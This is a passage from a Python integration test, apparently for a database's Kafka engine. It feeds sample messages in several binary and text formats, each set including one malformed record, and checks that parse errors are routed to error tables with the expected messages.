'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
# broken message
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\tBAD\tAM\t0.5\t1\n',
],
'expected':'''{"raw_message":"id\\tblockNo\\tval1\\tval2\\tval3\\nInt64\\tUInt16\\tString\\tFloat32\\tUInt8\\n0\\tBAD\\tAM\\t0.5\\t1\\n","error":"Cannot parse input: expected '\\\\t' before: 'BAD\\\\tAM\\\\t0.5\\\\t1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'printable':True,
},
'Native': {
'data_sample': [
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
b'\x05\x0f\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01',
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
# broken message
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x53\x74\x72\x69\x6e\x67\x03\x42\x41\x44\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
],
'expected':'''{"raw_message":"050102696405496E743634000000000000000007626C6F636B4E6F06537472696E67034241440476616C3106537472696E6702414D0476616C3207466C6F617433320000003F0476616C330555496E743801","error":"Cannot convert: String to UInt16"}''',
'printable':False,
},
'RowBinary': {
'data_sample': [
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# broken message
b'\x00\x00\x00\x00\x00\x00\x00\x00\x03\x42\x41\x44\x02\x41\x4d\x00\x00\x00\x3f\x01',
],
'expected':'{"raw_message":"00000000000000000342414402414D0000003F01","error":"Cannot read all data. Bytes read: 9. Bytes expected: 65.: (at row 1)\\n"}',
'printable':False,
},
'RowBinaryWithNamesAndTypes': {
'data_sample': [
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# broken message
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x53\x74\x72\x69\x6e\x67\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x03\x42\x41\x44\x02\x41\x4d\x00\x00\x00\x3f\x01',
],
'expected':'{"raw_message":"0502696407626C6F636B4E6F0476616C310476616C320476616C3305496E74363406537472696E6706537472696E6707466C6F617433320555496E743800000000000000000342414402414D0000003F01","error":"Cannot read all data. Bytes read: 9. Bytes expected: 65.: (at row 1)\\n"}',
'printable':False,
},
'ORC': {
'data_sample': [
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x0f\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x7e\x25\x0e\x2e\x46\x43\x21\x46\x4b\x09\xad\x00\x06\x00\x33\x00\x00\x0a\x17\x0a\x03\x00\x00\x00\x12\x10\x08\x0f\x22\x0a\x0a\x02\x41\x4d\x12\x02\x41\x4d\x18\x3c\x50\x00\x3a\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x7e\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x66\x73\x3d\xd3\x00\x06\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x02\x10\x02\x18\x1e\x50\x00\x05\x00\x00\x0c\x00\x2b\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38\x39\x31\x30\x31\x31\x31\x32\x31\x33\x31\x34\x31\x35\x09\x00\x00\x06\x01\x03\x02\x09\x00\x00\xc0\x0e\x00\x00\x07\x00\x00\x42\x00\x80\x05\x00\x00\x41\x4d\x0a\x00\x00\xe3\xe2\x42\x01\x00\x09\x00\x00\xc0\x0e\x02\x00\x05\x00\x00\x0c\x01\x94\x00\x00\x2d\xca\xc1\x0e\x80\x30\x08\x03\xd0\xc1\x60\x2e\xf3\x62\x76\x6a\xe2\x0e\xfe\xff\x57\x5a\x3b\x0f\xe4\x51\xe8\x68\xbd\x5d\x05\xe7\xf8\x34\x40\x3a\x6e\x59\xb1\x64\xe0\x91\xa9\xbf\xb1\x97\xd2\x95\x9d\x1e\xca\x55\x3a\x6d\xb4\xd2\xdd\x0b\x74\x9a\x74\xf7\x12\x39\xbd\x97\x7f\x7c\x06\xbb\xa6\x8d\x97\x17\xb4\x00\x00\xe3\x4a\xe6\x62\xe1\xe0\x0f\x60\xe0\xe2\xe3\xe0\x17\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\xe0\x57\xe2\xe0\x62\x34\x14\x62\xb4\x94\xd0\x02\x8a\xc8\x73\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\xc2\x06\x28\x26\xc4\x25\xca\xc1\x6f\xc4\xcb\xc5\x68\x20\xc4\x6c\xa0\x67\x2a\xc5\x6c\xae\x67\x0a\x14\xe6\x87\x1a\xc6\x24\xc0\x24\x21\x07\x32\x0c\x00\x4a\x01\x00\xe3\x60\x16\x58\xc3\x24\xc5\xcd\xc1\x2c\x30\x89\x51\xc2\x4b\xc1\x57\x83\x5f\x49\x83\x83\x47\x88\x95\x91\x89\x99\x85\x55\x8a\x3d\x29\x27\x3f\x39\xdb\x2f\x5f\x8a\x29\x33\x45\x8a\xa5\x2c\x31\xc7\x10\x4c\x1a\x81\x49\x63\x25\x26\x0e\x46\x20\x66\x07\x63\x36\x0e\x3e\x0d\x26\x03\x10\x9f\xd1\x80\xdf\x8a\x85\x83\x3f\x80\xc1\x8a\x8f\x83\x5f\x88\x8d\x83\x41\x80\x41\x82\x21\x80\x21\x82\xd5\x4a\x80\x83\x5f\x89\x83\x8b\xd1\x50\x88\xd1\x52\x42\x0b\x28\x22\x6f\x25\x04\x14\xe1\xe2\x62\x72\xf4\x15\x02\x62\x09\x1b\xa0\x98\x90\x95\x28\x07\xbf\x11\x2f\x17\xa3\x81\x10\xb3\x81\x9e\xa9\x14\xb3\xb9\x9e\x29\x50\x98\x1f\x6a\x18\x93\x00\x93\x84\x1c\xc8\x30\x87\x09\x7e\x1e\x0c\x00\x08\xa8\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x5d\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
# broken message
b'\x4f\x52\x43\x0a\x0b\x0a\x03\x00\x00\x00\x12\x04\x08\x01\x50\x00\x0a\x15\x0a\x05\x00\x00\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x0a\x12\x0a\x06\x00\x00\x00\x00\x00\x00\x12\x08\x08\x01\x42\x02\x08\x06\x50\x00\x0a\x12\x0a\x06\x00\x00\x00\x00\x00\x00\x12\x08\x08\x01\x42\x02\x08\x04\x50\x00\x0a\x29\x0a\x04\x00\x00\x00\x00\x12\x21\x08\x01\x1a\x1b\x09\x00\x00\x00\x00\x00\x00\xe0\x3f\x11\x00\x00\x00\x00\x00\x00\xe0\x3f\x19\x00\x00\x00\x00\x00\x00\xe0\x3f\x50\x00\x0a\x15\x0a\x05\x00\x00\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\xff\x80\xff\x80\xff\x00\xff\x80\xff\x03\x42\x41\x44\xff\x80\xff\x02\x41\x4d\xff\x80\x00\x00\x00\x3f\xff\x80\xff\x01\x0a\x06\x08\x06\x10\x00\x18\x0d\x0a\x06\x08\x06\x10\x01\x18\x17\x0a\x06\x08\x06\x10\x02\x18\x14\x0a\x06\x08\x06\x10\x03\x18\x14\x0a\x06\x08\x06\x10\x04\x18\x2b\x0a\x06\x08\x06\x10\x05\x18\x17\x0a\x06\x08\x00\x10\x00\x18\x02\x0a\x06\x08\x00\x10\x01\x18\x02\x0a\x06\x08\x01\x10\x01\x18\x02\x0a\x06\x08\x00\x10\x02\x18\x02\x0a\x06\x08\x02\x10\x02\x18\x02\x0a\x06\x08\x01\x10\x02\x18\x03\x0a\x06\x08\x00\x10\x03\x18\x02\x0a\x06\x08\x02\x10\x03\x18\x02\x0a\x06\x08\x01\x10\x03\x18\x02\x0a\x06\x08\x00\x10\x04\x18\x02\x0a\x06\x08\x01\x10\x04\x18\x04\x0a\x06\x08\x00\x10\x05\x18\x02\x0a\x06\x08\x01\x10\x05\x18\x02\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x1a\x03\x47\x4d\x54\x0a\x59\x0a\x04\x08\x01\x50\x00\x0a\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x0a\x08\x08\x01\x42\x02\x08\x06\x50\x00\x0a\x08\x08\x01\x42\x02\x08\x04\x50\x00\x0a\x21\x08\x01\x1a\x1b\x09\x00\x00\x00\x00\x00\x00\xe0\x3f\x11\x00\x00\x00\x00\x00\x00\xe0\x3f\x19\x00\x00\x00\x00\x00\x00\xe0\x3f\x50\x00\x0a\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x08\x03\x10\xec\x02\x1a\x0c\x08\x03\x10\x8e\x01\x18\x1d\x20\xc1\x01\x28\x01\x22\x2e\x08\x0c\x12\x05\x01\x02\x03\x04\x05\x1a\x02\x69\x64\x1a\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x1a\x04\x76\x61\x6c\x31\x1a\x04\x76\x61\x6c\x32\x1a\x04\x76\x61\x6c\x33\x20\x00\x28\x00\x30\x00\x22\x08\x08\x04\x20\x00\x28\x00\x30\x00\x22\x08\x08\x08\x20\x00\x28\x00\x30\x00\x22\x08\x08\x08\x20\x00\x28\x00\x30\x00\x22\x08\x08\x05\x20\x00\x28\x00\x30\x00\x22\x08\x08\x01\x20\x00\x28\x00\x30\x00\x30\x01\x3a\x04\x08\x01\x50\x00\x3a\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x3a\x08\x08\x01\x42\x02\x08\x06\x50\x00\x3a\x08\x08\x01\x42\x02\x08\x04\x50\x00\x3a\x21\x08\x01\x1a\x1b\x09\x00\x00\x00\x00\x00\x00\xe0\x3f\x11\x00\x00\x00\x00\x00\x00\xe0\x3f\x19\x00\x00\x00\x00\x00\x00\xe0\x3f\x50\x00\x3a\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x40\x90\x4e\x48\x01\x08\xd5\x01\x10\x00\x18\x80\x80\x04\x22\x02\x00\x0b\x28\x5b\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
],
'expected':r'''{"raw_message":"4F52430A0B0A030000001204080150000A150A050000000000120C0801120608001000180050000A120A06000000000000120808014202080650000A120A06000000000000120808014202080450000A290A0400000000122108011A1B09000000000000E03F11000000000000E03F19000000000000E03F50000A150A050000000000120C080112060802100218025000FF80FF80FF00FF80FF03424144FF80FF02414DFF800000003FFF80FF010A0608061000180D0A060806100118170A060806100218140A060806100318140A0608061004182B0A060806100518170A060800100018020A060800100118020A060801100118020A060800100218020A060802100218020A060801100218030A060800100318020A060802100318020A060801100318020A060800100418020A060801100418040A060800100518020A060801100518021204080010001204080010001204080010001204080010001204080010001204080010001A03474D540A590A04080150000A0C0801120608001000180050000A0808014202080650000A0808014202080450000A2108011A1B09000000000000E03F11000000000000E03F19000000000000E03F50000A0C080112060802100218025000080310EC021A0C0803108E01181D20C1012801222E080C120501020304051A0269641A07626C6F636B4E6F1A0476616C311A0476616C321A0476616C33200028003000220808042000280030002208080820002800300022080808200028003000220808052000280030002208080120002800300030013A04080150003A0C0801120608001000180050003A0808014202080650003A0808014202080450003A2108011A1B09000000000000E03F11000000000000E03F19000000000000E03F50003A0C08011206080210021802500040904E480108D5011000188080042202000B285B300682F403034F524318","error":"Cannot parse string 'BAD' as UInt16: syntax error at begin of string. Note: there are toUInt16OrZero and toUInt16OrNull functions, which returns zero\/NULL instead of throwing exception."}''',
'printable':False,
}
}
topic_name_prefix = 'format_tests_4_stream_'
for format_name, format_opts in list(all_formats.items()):
print(('Set up {}'.format(format_name)))
topic_name = topic_name_prefix + '{}'.format(format_name)
data_sample = format_opts['data_sample']
data_prefix = []
raw_message = '_raw_message'
# prepend empty value when supported
if format_opts.get('supports_empty_value', False):
data_prefix = data_prefix + ['']
if format_opts.get('printable', False) == False:
raw_message = 'hex(_raw_message)'
kafka_produce(kafka_cluster, topic_name, data_prefix + data_sample)
instance.query('''
DROP TABLE IF EXISTS test.kafka_{format_name};
CREATE TABLE test.kafka_{format_name} (
id Int64,
blockNo UInt16,
val1 String,
val2 Float32,
val3 UInt8
) ENGINE = Kafka()
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}',
kafka_format = '{format_name}',
kafka_handle_error_mode = 'stream',
kafka_flush_interval_ms = 1000 {extra_settings};
DROP TABLE IF EXISTS test.kafka_data_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_data_{format_name}_mv Engine=Log AS
SELECT *, _topic, _partition, _offset FROM test.kafka_{format_name}
WHERE length(_error) = 0;
DROP TABLE IF EXISTS test.kafka_errors_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_errors_{format_name}_mv Engine=Log AS
SELECT {raw_message} as raw_message, _error as error, _topic as topic, _partition as partition, _offset as offset FROM test.kafka_{format_name}
WHERE length(_error) > 0;
'''.format(topic_name=topic_name, format_name=format_name, raw_message=raw_message,
